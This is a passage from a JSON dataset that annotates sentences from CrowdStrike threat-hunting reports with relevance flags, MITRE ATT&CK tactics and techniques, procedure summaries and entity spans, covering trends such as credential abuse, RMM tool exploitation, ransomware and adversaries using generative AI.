leave minimal footprints in each domain, like separate puzzle pieces.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s33-b82b81", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 33, "context_before": "These attacks leave minimal footprints in each domain, like separate puzzle pieces.", "sentence_text": "Only when combined can the full picture of suspicious activities be revealed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s34-059855", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 34, "context_before": "Only when combined can the full picture of suspicious activities be revealed.", "sentence_text": "In addition to conducting cross-domain attacks, adversaries are developing greater expertise in moving seamlessly between platforms and using tools that are equally effective across operating systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s35-bcccef", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 35, "context_before": "In addition to conducting cross-domain attacks, adversaries are developing greater expertise in moving seamlessly between platforms and using tools that are equally effective across operating systems.", "sentence_text": "This rise in “hybrid threats” presents significant challenges to defenders across disciplines.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s36-ab5957", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 36, "context_before": "This rise in “hybrid threats” presents significant challenges to defenders across disciplines.", "sentence_text": "Stealthy adversaries exploit legitimate credentials to gain access Adversaries continue to exploit compromised credentials obtained through social engineering or purchased from access brokers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Exploit legitimate or compromised credentials to gain access.", "entities": [ { "text": "Stealthy adversaries", "start": 0, "end": 20, "label": "ThreatActor" }, { "text": "exploit legitimate credentials to gain access", "start": 21, "end": 66, "label": "Action" }, { "text": "Adversaries", "start": 67, "end": 78, "label": "ThreatActor" }, { "text": "exploit compromised credentials", "start": 91, "end": 122, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s37-739a34", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 37, "context_before": "Stealthy adversaries exploit legitimate credentials to gain access Adversaries continue to exploit compromised credentials obtained through social engineering or purchased from access brokers.", "sentence_text": "This tactic uses built-in system utilities and trusted applications, making it harder for traditional security measures to detect and block the attack.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "use built-in system utilities and trusted applications", "entities": [ { "text": "built-in system utilities", "start": 17, "end": 42, "label": "Infrastructure_Indicator" }, { "text": " applications", "start": 54, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s38-093f12", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 38, "context_before": "This tactic uses built-in system utilities and trusted applications, making it harder for traditional security measures to detect and block the attack.", "sentence_text": "By blending in with normal operations, attackers can maintain a low profile and extend their presence within a network without raising alarms.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "blend in with normal operations to maintain persistence", "entities": [ { "text": "attackers", "start": 39, "end": 48, "label": "ThreatActor" }, { "text": " maintain a low profile", "start": 52, "end": 75, "label": "Action" }, { "text": "extend their presence", "start": 80, "end": 101, "label": "Action" }, { "text": " network", "start": 110, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "blending in", "start": 3, "end": 14, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s39-206b78", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 39, "context_before": "By blending in with normal operations, attackers can maintain a low profile and extend their presence within a network without raising alarms.", "sentence_text": "SCATTERED SPIDER remains the most prominent adversary in cloud-based intrusions, conducting 29% of all associated activity observed in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s40-3a4098", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 40, "context_before": "SCATTERED SPIDER remains the most prominent adversary in cloud-based intrusions, conducting 29% of all associated activity observed in 2023.", "sentence_text": "Throughout 2023 and 2024, this adversary demonstrated its expertise in navigating cloud environments, often using spear-phishing, policy changes and password manager access to gain access, maintain persistence, move laterally and exfiltrate data.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "using spear-phishing, policy changes, and password manager access", "entities": [ { "text": "this adversary", "start": 26, "end": 40, "label": "ThreatActor" }, { "text": " navigating cloud environments", "start": 70, "end": 100, "label": "Action" }, { "text": " gain access", "start": 175, "end": 187, "label": "Action" }, { "text": "maintain persistence,", "start": 189, "end": 210, "label": "Action" }, { "text": " move laterally ", "start": 210, "end": 226, "label": "Action" }, { "text": "exfiltrate data", "start": 230, "end": 245, "label": "Action" }, { "text": "using spear-phishing, policy changes and password manager access", "start": 108, "end": 172, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s41-cfb63c", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 41, "context_before": "Throughout 2023 and 2024, this adversary demonstrated its expertise in navigating cloud environments, often using spear-phishing, policy changes and password manager access to gain access, maintain persistence, move laterally and exfiltrate data.", "sentence_text": "Between July 2023 and June 2024, CrowdStrike OverWatch observed several lower-sophistication techniques targeting cloud environments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "targeting cloud environments with lower-sophistication techniques", "entities": [ { "text": " cloud environments", "start": 113, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "targeting", "start": 104, "end": 113, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s42-f7331a", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 42, "context_before": "Between July 2023 and June 2024, CrowdStrike OverWatch observed several lower-sophistication techniques targeting cloud environments.", "sentence_text": "Rather than collecting cloud credentials as a standard enumeration practice, several cloud-conscious adversaries are pivoting between the cloud control plane and cloud-hosted virtual machines (VMs) using the command line tools that interface with the cloud control plane and VM management agents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s43-b1fa74", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 43, "context_before": "Rather than collecting cloud credentials as a standard enumeration practice, several cloud-conscious adversaries are pivoting between the cloud control plane and cloud-hosted virtual machines (VMs) using the command line tools that interface with the cloud control plane and VM management agents.", "sentence_text": "Exploiting RMM tools is a tried-and-true technique in endpoint intrusion Adversaries increasingly use proven techniques, notably legitimate RMM tools like ConnectWise ScreenConnect and AnyDesk, during endpoint intrusions.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "exploiting RMM tools like ConnectWise ScreenConnect and AnyDesk", "entities": [ { "text": "Adversaries", "start": 73, "end": 84, "label": "ThreatActor" }, { "text": "Exploiting RMM tools", "start": 0, "end": 20, "label": "Action" }, { "text": "RMM tools", "start": 140, "end": 149, "label": "MalwareTool" }, { "text": " ConnectWise ScreenConnect ", "start": 154, "end": 181, "label": "MalwareTool" }, { "text": "AnyDesk", "start": 185, "end": 192, "label": "MalwareTool" }, { "text": "endpoint intrusions", "start": 201, "end": 220, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s44-5bab33", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 44, "context_before": "Exploiting RMM tools is a tried-and-true technique in endpoint intrusion Adversaries increasingly use proven techniques, notably legitimate RMM tools like ConnectWise ScreenConnect and AnyDesk, during endpoint intrusions.", "sentence_text": "In the past 12 months, RMM tool exploitation surged, accounting for 27% of all hands-on-keyboard intrusions.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "RMM tool exploitation", "entities": [ { "text": " RMM tool exploitation ", "start": 22, "end": 45, "label": "Action" }, { "text": "hands-on-keyboard intrusions", "start": 79, "end": 107, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s45-42d18b", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 45, "context_before": "In the past 12 months, RMM tool exploitation surged, accounting for 27% of all hands-on-keyboard intrusions.", "sentence_text": "This consistency highlights the need to understand adversary behavior throughout the kill chain to detect and disrupt attacks rapidly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p7-s46-2c5a00", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 7, "sentence_id": 46, "context_before": "This consistency highlights the need to understand adversary behavior throughout the kill chain to detect and disrupt attacks rapidly.", "sentence_text": "These findings represent CrowdStrike's efforts to disrupt the adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p8-s47-41a863", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 8, "sentence_id": 47, "context_before": "These findings represent CrowdStrike's efforts to disrupt the adversary.", "sentence_text": "INTRUSION TRENDS BY ADVERSARY targeted intrusion and hacktivist adversaries — and more than 140 active clusters of malicious activity that have not yet met CrowdStrike’s standards for adversary classification — CrowdStrike OverWatch threat hunters are well-positioned to quickly and accurately disrupt today's adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p8-s48-7a5b7f", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 8, "sentence_id": 48, "context_before": "INTRUSION TRENDS BY ADVERSARY targeted intrusion and hacktivist adversaries — and more than 140 active clusters of malicious activity that have not yet met CrowdStrike’s standards for adversary classification — CrowdStrike OverWatch threat hunters are well-positioned to quickly and accurately disrupt today's adversaries.", "sentence_text": "To learn about adversaries targeting your region and sector, visit the Adversary Universe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p8-s49-4cec1c", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 8, "sentence_id": 49, "context_before": "To learn about adversaries targeting your region and sector, visit the Adversary Universe.", "sentence_text": "North America Western Europe Southern Europe PUNK SCATTERED BITWISE PUNK WANDERING BITWISE VICE FANCY WANDERING SPIDER SPIDER SPIDER SPIDER SPIDER SPIDER SPIDER BEAR SPIDER TECHNOLOGY FINANCIAL MANUFACTURING REAL ESTATE MANUFACTURING SERVICES* GOODS* AEROSPACE SERVICES* SERVICES* TECHNOLOGY FINANCIAL SERVICES* TECHNOLOGY ENERGY TECHNOLOGY MANUFACTURING ACADEMIC TELECOM HEALTHCARE GOODS* FINANCIAL EXTRACTIVE GOVERNMENT South America East Asia Oceania", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p8-s50-27f64e", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 8, "sentence_id": 50, "context_before": "North America Western Europe Southern Europe PUNK SCATTERED BITWISE PUNK WANDERING BITWISE VICE FANCY WANDERING SPIDER SPIDER SPIDER SPIDER SPIDER SPIDER SPIDER BEAR SPIDER TECHNOLOGY FINANCIAL MANUFACTURING REAL ESTATE MANUFACTURING SERVICES* GOODS* AEROSPACE SERVICES* SERVICES* TECHNOLOGY FINANCIAL SERVICES* TECHNOLOGY ENERGY TECHNOLOGY MANUFACTURING ACADEMIC TELECOM HEALTHCARE GOODS* FINANCIAL EXTRACTIVE GOVERNMENT South America East Asia Oceania", "sentence_text": "VICE BITWISE SILENT ETHEREAL BITWISE PUNK BITWISE VICE SPIDER SPIDER CHOLLIMA PANDA SPIDER SPIDER SPIDER SPIDER MANUFACTURING LOGISTICS AGRICULTURE TECHNOLOGY MANUFACTURING AUTOMOTIVE ENERGY FINANCIAL REAL ESTATE SERVICES* GOVERNMENT INDUSTRIAL INDUSTRIAL HOSPITALITY HEALTHCARE RETAIL ENERGY MANUFACTURING RETAIL RETAIL UTILITIES TECHNOLOGY Middle East South Asia Southeast Asia BITWISE PULSAR BITWISE AQUATIC LABYRINTH HORDE BITWISE FAMOUS JACKPOT SPIDER", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p8-s51-967afb", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 8, "sentence_id": 51, "context_before": "VICE BITWISE SILENT ETHEREAL BITWISE PUNK BITWISE VICE SPIDER SPIDER CHOLLIMA PANDA SPIDER SPIDER SPIDER SPIDER MANUFACTURING LOGISTICS AGRICULTURE TECHNOLOGY MANUFACTURING AUTOMOTIVE ENERGY FINANCIAL REAL ESTATE SERVICES* GOVERNMENT INDUSTRIAL INDUSTRIAL HOSPITALITY HEALTHCARE RETAIL ENERGY MANUFACTURING RETAIL RETAIL UTILITIES TECHNOLOGY Middle East South Asia Southeast Asia BITWISE PULSAR BITWISE AQUATIC LABYRINTH HORDE BITWISE FAMOUS JACKPOT SPIDER", "sentence_text": "KITTEN SPIDER PANDA CHOLLIMA PANDA SPIDER CHOLLIMA PANDA SERVICES*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p8-s52-32bdf4", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 8, "sentence_id": 52, "context_before": "KITTEN SPIDER PANDA CHOLLIMA PANDA SPIDER CHOLLIMA PANDA SERVICES*", "sentence_text": "REAL ESTATE RETAIL FINANCIAL FINANCIAL TELECOM HEALTHCARE FINANCIAL COMPUTERGAMING HEALTHCARE TECHNOLOGY SERVICES* TECHNOLOGY HOSPITALITY TECHNOLOGY SERVICES* ACADEMIC GOVERNMENT EXTRACTIVE INDUSTRIALS MANUFACTURING *SERVICES = CONSULTING AND PROFESSIONAL SERVICES July 2023-June 2024 *GOODS = CONSUMER GOODS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s53-f0142b", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 53, "context_before": "REAL ESTATE RETAIL FINANCIAL FINANCIAL TELECOM HEALTHCARE FINANCIAL COMPUTERGAMING HEALTHCARE TECHNOLOGY SERVICES* TECHNOLOGY HOSPITALITY TECHNOLOGY SERVICES* ACADEMIC GOVERNMENT EXTRACTIVE INDUSTRIALS MANUFACTURING *SERVICES = CONSULTING AND PROFESSIONAL SERVICES July 2023-June 2024 *GOODS = CONSUMER GOODS", "sentence_text": "Conclusion\nThis executive summary highlights key insights derived from observations that CrowdStrike OverWatch threat hunters gain during interactive intrusion attempts on a daily basis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s54-523c97", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 54, "context_before": "Conclusion\nThis executive summary highlights key insights...", "sentence_text": "While adversaries seek weaknesses and aim to avoid detection, the CrowdStrike OverWatch team is similarly sharpening its skills and narrowing its focus.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s55-6e5c2f", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 55, "context_before": "While adversaries seek weaknesses and aim to avoid detection, the CrowdStrike OverWatch team is similarly sharpening its skills and narrowing its focus.", "sentence_text": "When attackers and defenders battle over sophistication and tradecraft, speed often becomes the tiebreaker.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s56-5a8153", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 56, "context_before": "When attackers and defenders battle over sophistication and tradecraft, speed often becomes the tiebreaker.", "sentence_text": "To accelerate their operations, attackers and defenders use all available tools — including AI.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s57-4f07c3", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 57, "context_before": "To accelerate their operations, attackers and defenders use all available tools — including AI.", "sentence_text": "augmented with continuous feedback from CrowdStrike OverWatch threat hunters and intelligence experts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s58-94eab9", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 58, "context_before": "augmented with continuous feedback from CrowdStrike OverWatch threat hunters and intelligence experts.", "sentence_text": "CrowdStrike regularly uses AI to:\n► Combat increasingly sophisticated attacks by identifying adversary behavior and threat patterns ► Solve hyperscale data challenges by analyzing intelligence and threat telemetry with speed and at scale ► Automate repetitive security tasks and unleash machine-speed intelligence to automate detection and response Adversaries aren’t stopping, and neither are we.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s59-823ad5", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 59, "context_before": "CrowdStrike regularly uses AI to:\n► Combat increasingly sophisticated attacks by identifying adversary behavior and threat patterns ► Solve hyperscale data challenges by analyzing intelligence and threat telemetry with speed and at scale ► Automate repetitive security tasks and unleash machine-speed intelligence to automate detection and response Adversaries aren’t stopping, and neither are we.", "sentence_text": "In today’s challenging threat landscape, tooling is imperative — and AI is just one tool in an arsenal that empowers CrowdStrike OverWatch threat hunters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s60-5a982d", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 60, "context_before": "In today’s challenging threat landscape, tooling is imperative — and AI is just one tool in an arsenal that empowers CrowdStrike OverWatch threat hunters.", "sentence_text": "Together, we can outsmart and outpace today's most sophisticated threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p9-s61-bd711c", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 9, "sentence_id": 61, "context_before": "Together, we can outsmart and outpace today's most sophisticated threats.", "sentence_text": "We have never been more committed to stopping breaches and building a more resilient future together.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p10-s62-e465ad", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 10, "sentence_id": 62, "context_before": "We have never been more committed to stopping breaches and building a more resilient future together.", "sentence_text": "About CrowdStrike\nmodern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p10-s63-138a7c", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 10, "sentence_id": 63, "context_before": "About CrowdStrike\nmodern security with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p10-s64-e73e90", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 10, "sentence_id": 64, "context_before": "Learn more: www.crowdstrike.com Follow us: Blog | X | LinkedIn", "sentence_text": "| Facebook | Instagram Start a free trial today: www.crowdstrike.com/free-trial-guide Graph are marks owned by CrowdStrike, Inc. and registered with the United States Patent and Trademark Office, and in other countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s1-7c4059", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "2025 CrowdStrike Threat Hunting Report: Adversaries Weaponize and Target AI at Scale DPRK-nexus adversaries infiltrate 320+ companies using GenAI accelerated attacks; threat actors exploit AI agents, exposing autonomous systems as the next enterprise attack surface AUSTIN, Texas & LAS VEGAS--(BUSINESS WIRE)--Aug.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s2-cefc47", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 2, "context_before": "2025 CrowdStrike Threat Hunting Report: Adversaries Weaponize and Target AI at Scale DPRK-nexus adversaries infiltrate 320+ companies using GenAI accelerated attacks; threat actors exploit AI agents, exposing autonomous systems as the next enterprise attack surface AUSTIN, Texas & LAS VEGAS--(BUSINESS WIRE)--Aug.", "sentence_text": "Based on frontline intelligence from CrowdStrike’s elite threat hunters and intelligence analysts tracking more than 265 named adversaries, the report reveals:\nAdversaries Weaponize AI at Scale: DPRK-nexus adversary FAMOUS CHOLLIMA used GenAI to automate every phase of its insider attack program.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s3-394502", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 3, "context_before": "Based on frontline intelligence from CrowdStrike’s elite threat hunters and intelligence analysts tracking more than 265 named adversaries, the report reveals:\nAdversaries Weaponize AI at Scale: DPRK-nexus adversary FAMOUS CHOLLIMA used GenAI to automate every phase of its insider attack program.", "sentence_text": "From building fake resumes and conducting deepfake interviews to completing technical tasks under false identities – AI-powered adversary tradecraft is transforming traditional insider threats into scalable, persistent operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "building fake resumes, conducting deepfake interviews, completing technical tasks under false identities", "entities": [ { "text": " building fake resumes", "start": 4, "end": 26, "label": "Action" }, { "text": "conducting deepfake interviews ", "start": 31, "end": 62, "label": "Action" }, { "text": "completing", "start": 65, "end": 75, "label": "Action" }, { "text": "AI-powered adversary", "start": 117, "end": 137, "label": "ThreatActor" }, { "text": " tradecraft", "start": 137, "end": 148, "label": "ThreatActor" }, { "text": "transforming", "start": 152, "end": 164, "label": "Action" } ] }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s4-75be83", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 4, "context_before": "From building fake resumes and conducting deepfake interviews to completing technical tasks under false identities – AI-powered adversary tradecraft is transforming traditional insider threats into scalable, persistent operations.", "sentence_text": "Russia-nexus adversary EMBER BEAR used GenAI to amplify pro-Russia narratives and Iran-nexus adversary CHARMING KITTEN deployed LLM-crafted phishing lures targeting U.S. and EU entities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "use GenAI to amplify narratives; deploy LLM-crafted phishing lures", "entities": [ { "text": "Russia-nexus adversary", "start": 0, "end": 22, "label": "ThreatActor" }, { "text": "EMBER BEAR", "start": 23, "end": 33, "label": "ThreatActor" }, { "text": " GenAI ", "start": 38, "end": 45, "label": "MalwareTool" }, { "text": " amplify", "start": 47, "end": 55, "label": "Action" }, { "text": "Iran-nexus adversary", "start": 82, "end": 102, "label": "ThreatActor" }, { "text": "CHARMING KITTEN", "start": 103, "end": 118, "label": "ThreatActor" }, { "text": "deployed", "start": 119, "end": 127, "label": "Action" }, { "text": "targeting", "start": 155, "end": 164, "label": "Action" }, { "text": "LLM-crafted phishing lures", "start": 128, "end": 154, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s5-481727", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 5, "context_before": "Russia-nexus adversary EMBER BEAR used GenAI to amplify pro-Russia narratives and Iran-nexus adversary CHARMING KITTEN deployed LLM-crafted phishing lures targeting U.S. and EU entities.", "sentence_text": "Agentic AI Is the New Attack Surface: CrowdStrike observed multiple threat actors exploiting vulnerabilities in tools used to build AI agents, gaining unauthenticated access, establishing persistence, harvesting credentials, and deploying malware and ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploiting AI agent vulnerabilities to gain access, establish persistence, harvest credentials, and deploy malware", "entities": [ { "text": " threat actors", "start": 67, "end": 81, "label": "ThreatActor" }, { "text": "exploiting ", "start": 82, "end": 93, "label": "Action" }, { "text": "AI agents", "start": 132, "end": 141, "label": "Infrastructure_Indicator" }, { "text": " establishing persistence", "start": 174, "end": 199, "label": "Action" }, { "text": "gaining unauthenticated access", "start": 143, "end": 173, "label": "Action" }, { "text": "harvesting credentials", "start": 201, "end": 223, "label": "Action" }, { "text": "deploying", "start": 229, "end": 238, "label": "Action" }, { "text": " malware and ransomware", "start": 238, "end": 261, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s6-e63299", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 6, "context_before": "Agentic AI Is the New Attack Surface: CrowdStrike observed multiple threat actors exploiting vulnerabilities in tools used to build AI agents, gaining unauthenticated access, establishing persistence, harvesting credentials, and deploying malware and ransomware.", "sentence_text": "These attacks demonstrate how the agentic AI revolution is reshaping the enterprise attack surface – turning autonomous workflows and non-human identities into the next frontier of adversary exploitation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploiting autonomous workflows and non-human identities", "entities": [ { "text": "autonomous workflows", "start": 109, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "non-human identities ", "start": 134, "end": 155, "label": "Infrastructure_Indicator" }, { "text": " exploitation", "start": 190, "end": 203, "label": "Action" }, { "text": "attacks ", "start": 6, "end": 14, "label": "Action" } ] }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s7-666e26", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 7, "context_before": "These attacks demonstrate how the agentic AI revolution is reshaping the enterprise attack surface – turning autonomous workflows and non-human identities into the next frontier of adversary exploitation.", "sentence_text": "Funklocker and SparkCat are early proof points that GenAI-built malware is no longer theoretical, it’s already operational.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s8-4d6f8b", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 8, "context_before": "Funklocker and SparkCat are early proof points that GenAI-built malware is no longer theoretical, it’s already operational.", "sentence_text": "In one incident, the group moved from initial access to encryption by deploying ransomware in under 24 hours.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "moved from initial access to encryption by deploying ransomware in under 24 hours", "entities": [ { "text": " initial access", "start": 37, "end": 52, "label": "Action" }, { "text": "encryption", "start": 56, "end": 66, "label": "Action" }, { "text": "deploying", "start": 70, "end": 79, "label": "Action" }, { "text": "ransomware", "start": 80, "end": 90, "label": "MalwareTool" }, { "text": "group", "start": 21, "end": 26, "label": "ThreatActor" }, { "text": " moved", "start": 26, "end": 32, "label": "Action" } ] }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s9-e2109b", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 9, "context_before": "In one incident, the group moved from initial access to encryption by deploying ransomware in under 24 hours.", "sentence_text": "“The AI era has redefined how businesses operate, and how adversaries attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s10-a642d7", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 10, "context_before": "“The AI era has redefined how businesses operate, and how adversaries attack.", "sentence_text": "Securing the AI that powers business is where the cyber battleground is evolving.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s11-1254c8", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 11, "context_before": "Securing the AI that powers business is where the cyber battleground is evolving.”", "sentence_text": "Additional Resources:\nDownload the 2025 CrowdStrike Threat Hunting Report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-41_crowdstrike_report-p1-s12-2a3056", "source": "crowdstrike", "doc_id": "41_crowdstrike_report", "page_number": 1, "sentence_id": 12, "context_before": "Additional Resources:\nDownload the 2025 CrowdStrike Threat Hunting Report.", 